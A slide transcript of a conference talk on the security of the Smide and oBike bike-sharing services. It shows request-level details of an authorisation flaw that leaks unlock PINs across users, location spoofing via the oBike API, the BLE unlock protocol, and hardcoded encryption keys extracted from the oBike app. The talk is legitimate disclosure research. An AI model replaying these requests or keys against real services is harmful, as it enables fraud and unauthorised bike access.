Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

On the Security of Dockless Bike Sharing Services

816 views

Published on

Presentation held at the a41con.ch security conference

Published in: Technology
  • Be the first to comment

  • Be the first to like this

On the Security of Dockless Bike Sharing Services

  1. 1. On the Security of Bike Sharing Services Antoine Neuenschwander AREA41 June 15th 2018
  2. 2. whoami Information Security Passionate Hobby Penetration Tester Beekeeper You can find me on Twitter: @ant0inet
  3. 3. Bike Sharing Services in Zurich Jul 2017 Oct 2016 Jan 2018 May 2018
  4. 4. Bike Sharing How To Install Mobile App Sign-up Buy credits Locate a bike on the map Start lease, ride & end lease Leave bike on the spot
  5. 5. Risks & Threats OPERATIONAL ISSUES – payment bypass – service availability – data protection BUSINESS IMPACT – financial loss – reputational damage SAFETY & LIABILITY – prevention of accidents
  6. 6. Smide BASED IN ZURICH backed by an insurance company HIGH-END E-BIKES CHF 6’500 unit price FLEET approx. 400 bikes (according to API) TRACKING integrated GPS and GSM modem FARE 0.25 CHF/min
  7. 7. Smide – Tracking smide GPS link GSM link REST
  8. 8. GET https://intern.smide.ch/api/v1/bikes HTTP/1.1 Accept: text/event-stream HTTP/1.1 200 OK Content-Type: text/event-stream; charset=UTF-8 { "type": "update", "data": { "id": "46", "name": "ZH253843", "batteryLevel": 76, "batteryRange": 40.0, "size": "20", "address": "Selnaustrasse 25, 8001 Zürich", "location": {"lat": 47.371944, "lng": 8.532015} } } ...
  9. 9. Smide – Theft Protection Theft mode is activated if the locked ST2 S is moved or pushed for an extended period of time. The motor is blocked and the position of the ST2 S is recorded periodically if a cell network connection exists.
  10. 10. Smide – Booking Process vacant/ locked booked/ unlocked booked/ locked
  11. 11. POST /api/v1/user/login HTTP/1.1 Content-Type: application/json { "email": "foo@example.com", "logintype": "password", "password": "correcthorsebatterystaple" } HTTP/1.1 200 OK Content-Type: application/json { "userId": "0123456789abcdef01234567", "token": <JWT-User1> }
  12. 12. <JWT-User1> = eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ1c2VycyIsI nVpZCI6IjAxMjM0NTY3ODlhYmNkZWYwMTIzNDU2NyIsInRpZCI6MTUwNDU 1OTkyMCwiZXhwIjoxNTA0NzMyNzIwfQ.F0GiaJaDxzaxa5GuoP-lvhI-r- XmTAkCdWpJuqA2GiUDKizbaIaN1xc-uZmdqBPucUMGzGJ- p7zZ5qx7_dpitQ { "alg": "HS512", "typ": "JWT" } { "iss": "users", "uid": "0123456789abcdef01234567", "tid": 1504559920, "exp": 1504732720 } 1741a2689683c736b16b91aea0ffa5be123eafe5e64c0902756a49baa0 361a25032a2cdb68868dd7173eb9999da813ee714306cc627ea7bcd9e6 ac7bfdda62
  13. 13. Smide – Booking Process vacant/ locked booked/ unlocked booked/ locked
  14. 14. POST /api/v1/booking HTTP/1.1 Authorization: Bearer <JWT USER-1> Content-Type: application/json {"bikeId": "133", "userId": "0123456789abcdef01234567"} HTTP/1.1 200 OK Content-Type: application/json { "bookingId": "12345", "active": true, "usage": false, "pin": "", "bike": { ... }, "startedAt": 1498257984 }
  15. 15. Smide – Booking Process vacant/ locked booked/ unlocked booked/ locked
  16. 16. PUT /api/v1/booking/12345/usage HTTP/1.1 Authorization: Bearer <JWT USER-1> Content-Type: application/json {"pin": 0, "usage": false} HTTP/1.1 200 OK Content-Type: application/json { "usage": false, "pin": "49637", }
  17. 17. PUT /api/v1/booking/12345/usage HTTP/1.1 Authorization: Bearer <JWT USER-2> Content-Type: application/json {"pin": 0, "usage": false} HTTP/1.1 200 OK Content-Type: application/json { "usage": false, "pin": "49637", }
  18. 18. Vuln Report 24.06.2017, 1:30 sent vuln report to info@smide.ch 24.06.2017, 14:19 got receipt from customer support 28.06.2017, 9:31 reply from product owner: – thanks for the report – vuln was fixed on 26.06. – 100 minutes offered
  19. 19. oBike HQ IN SINGAPORE deployed in 16 countries LOW-END BIKES single speed unit price estimation approx. USD 200 MAINTENANCE FREE solid rubber tires FARE 0.05 CHF/min
  20. 20. oBike – Tracking oBike G PS link BLE link REST
  21. 21. HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 { "data": { "iconUrl": null, "list": [{ "id": "041002258", "longitude": 8.535796, "latitude": 47.377381, "imei": "697432616C697A61", "countryId": 167, "helmet": 0 }, ... ] }, "success": true } GET /api/v1/bike/list?longitude=8.5416&latitude=47.3749 HTTP/1.1 Host: mobile.o.bike
  22. 22. PUT /api/v1/bike/location HTTP/1.1 Host: mobile.o.bike Authorization: Bearer <AuthToken> { "latitude": 47.3728299, "longitude": 8.5306202, "bikeId": "041002997" } HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 { "data": { "message": " " }, "success": true } Location report success!
  23. 23. https://fccid.io/2ALWC-HBT203/Internal-Photos/Internal-photos-3381070
  24. 24. https://fccid.io/2ALWC-HBT203/Internal-Photos/Internal-photos-3381070
  25. 25. https://www.youtube.com/watch?v=Vl3Gl8w8n-Q
  26. 26. The AES encryption/decryption core allows the user to encrypt and decrypt data using the AES algorithm with 128-bit keys. The AES core also supports ECB, CBC, CFB, OFB, CTR, and CBC-MAC, as well as hardware support for CCM.
  27. 27. BLE Command Structure 67 74 preamble 0D length 86 cmd 59 AE B6 .. 39 31 payload check FD 0x8X mobile → oBike 0x4X oBike → mobile cmd ^ b[0] ^ b[1] ^ ... ^ b[N-1] cmd check
  28. 28. BLE Init 67 74 preamble 00 length 86 cmd check 86 request 67 74 preamble 00 length 46 cmd check 46 response
  29. 29. BLE Store Coordinates 67 74 preamble 13 length 81 cmd 30 38 2e 35 33 30 38 34 32 32 08.5308422 request check b7 34 37 2e 33 37 32 37 36 30 47.372760
  30. 30. BLE Receive Challenge 67 74 preamble 13 length 41 cmd 00 11 51 00 constant (unknown) response check 28aa unknown 06 ef 5f 34 32 bit challenge 01 00 unknown
  31. 31. BLE Send Response 67 74 preamble 18 length 82 cmd 8b key idx request check 77 00 00 01 23 45 67 00 user id 2a 72 9d 59 timestamp (little endian) 2f 42 d3 b4 3b 1b 9d 51 e7 67 13 e3 AES CBC-MAC (truncated to 96 bits, why?)
  32. 32. 67 74 preamble 18 length 46 cmd response check 8b 00 00 01 23 45 67 00 user id 59 9d 72 2a timestamp (big endian) 44 31 39 33 36 42 33 31 37 bike id (D1936B317) 2a 72 9d 59 timestamp (little endian) trx 00 30 38 2e .. 32 08.5308422 34 37 2e .. 30 47.372760 87 76 f3 7a 8c be 90 f8 4b a4 fa 00 2e ae e3 dc AES CBC-MAC (128 bits) key idx 91
  33. 33. https://fccid.io/2ALWC-HBT203/Internal-Photos/Internal-photos-3381070 Texas Instruments CC2541 Debug Pads
  34. 34. https://www.pentestpartners.com/security-blog/dumping-cc2540-firmware-an-iot-how-to/
  35. 35. http://web.archive.org/web/20180102175104/http://www.comp.nus.edu.sg/~hug h/CS3235/CS3235-SemI-2017-18-FinalProjects.pdf
  36. 36. OBIKE MOBILE APP BACKEND challenge response acknowledgement unlock bike start billing BLE HTTP
  37. 37. HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 { "data": { "code": 400, "error": "The bike needs to be repaired, please try another one for your safety." }, "success": false }
  38. 38. HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 { "data": { "code": 500, "error": "Server is busy,please try later" }, "errorCode": 400, "success": false } GET /api/v1/bike/list?longitude=8.5416&latitude=47.3749 HTTP/1.1 Host: mobile.o.bike
  39. 39. POST /api/v1/bike/list HTTP/1.1 Host: mobile.o.bike { "value": "1a585fffc27493e530e50c48b834f0df905fa023d59a7db8d64bae39473cd75adc7c33e8a0 e9173845c9478046cff0c85bccbaecc7acd9cfadfc650c30cae4278d7f906da3a710742b637 279f21f5367f3ea2fd95564ee7077b85af5ef9ebcf7d456c15616ffda4f25524b587936984b 62abfe8a2a94c042d4893c9e74c267a42aed5310acc5fbb4924d57008cb2081e3e3009fdab5 cbc7fc640b72efc4e2ba2a10af81ac72aee5100e1c706b9eb500810e40aae855134fe9f625b b34a3626e843922c7c2b222e6f32daf69f130e9350" }
  40. 40. $ hexdump -C lib/x86/libobike.so ... 00001c90 65 fc 5b 5d c3 41 45 53 2f 43 42 43 2f 50 4b 43 |e.[].AES/CBC/PKC| 00001ca0 53 35 50 61 64 64 69 6e 67 00 6f 42 41 64 64 4d |S5Padding.oBAddM| 00001cb0 59 46 55 7a 4c 65 64 00 31 32 33 34 35 36 37 38 |YFUzLed.12345678| 00001cc0 39 30 31 32 33 34 35 36 00 6f 42 61 64 64 58 34 |90123456.oBaddX4| 00001cd0 62 75 68 42 4d 47 00 41 45 53 00 53 48 41 31 00 |buhBMG.AES.SHA1.| ...
  41. 41. REST Encryption AES-128 CBC plaintext SHA1 "oBaddX4buhBMG" "&" MAC plaintext MAC"&" ciphertext "oBAddMYFUzLed" app version no. "1234567890123456"
  42. 42. POST /api/v1/bike/list HTTP/1.1 Host: mobile.o.bike { "value": "1a585fffc27493e530e50c48b834f0df905fa023d59a7db8d64bae39473cd75adc7c33e8a0 e9173845c9478046cff0c85bccbaecc7acd9cfadfc650c30cae4278d7f906da3a710742b637 279f21f5367f3ea2fd95564ee7077b85af5ef9ebcf7d456c15616ffda4f25524b587936984b 62abfe8a2a94c042d4893c9e74c267a42aed5310acc5fbb4924d57008cb2081e3e3009fdab5 cbc7fc640b72efc4e2ba2a10af81ac72aee5100e1c706b9eb500810e40aae855134fe9f625b b34a3626e843922c7c2b222e6f32daf69f130e9350" } { "countryCode": 41, "latitude": "47.37326917039802", "longitude": "8.531275056302547", "deviceId": "0123456789abc-0123456789abcdef01", "dateTime": "1508318416019" } &21b7eaf2631f62fca73faf4c63fd75b1302aed4f
  43. 43. Conclusions ◎ Think about what could go wrong which risks are you willing to accept? ◎ Perform security audits get rid of the low hanging fruits ◎ Flaws will be found, keys will be leaked... make the devices fixable
  44. 44. Thanks! Any questions? 195.176.3.20 http://github.com/antoinet/obike @ant0inet @BrokenOBikes
  45. 45. HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 { "data": { "iconUrl": null, "list": [{ "id": "041002258", "longitude": 8.535796, "latitude": 47.377381, "imei": "697432616C697A61", "countryId": 167, "helmet": 0 }, ... ] }, "success": true } GET /api/v1/bike/list?longitude=8.5416&latitude=47.3749 HTTP/1.1 Host: mobile.o.bike International Mobile Equipment Identity?
  46. 46. 726934686572616C ri4heral 69376F6E53696D39 i7onSim9 726934686572616C ri4heral 6F6E384C30503166 on8L0P1f 7469376F6E53696D ti7onSim 30503166756E6374 0P1funct 30503166756E6374 0P1funct 7432616C697A6174 t2alizat 6E53696D39706C65 nSim9ple 69376F6E53696D39 i7onSim9 616C48496E697477 alHInitw 756E637469376F6E uncti7on 3166756e63746937 1functi7 4C30503166756E63 L0P1func 756E637469376F6E uncti7on 686572616C48496E heralHIn 3166756E63746937 1functi7 4550657269346865 EPeri4he 7432616C697A6174 t2alizat 3166756E63746937 1functi7 697432616C697A61 it2aliza 6C697A6174346F6E lizat4on 6C48496E6974776F lHInitwo 616C48496E697477 alHInitw 4C30503166756E63 L0P1func 39706C65424C4550 9pleBLEP 66756E637469376F functi7o 686572616C48496E heralHIn 6934686572616C48 i4heralH 616C697A6174346F alizat4o 6E384C3050316675 n8L0P1fu 4550657269346865 EPeri4he 376F6E53696D3970 7onSim9p 32616C697A617434 2alizat4 616C48496E697477 alHInitw 696D39706C65424C im9pleBL 6572693468657261 eri4hera 4C30503166756E63 L0P1func 39706C65424C4550 9pleBLEP 6174346F6E384C30 at4on8L0 ... InitalizatonLPfunctionSimpleBLEPeriheralHInitwo ...

×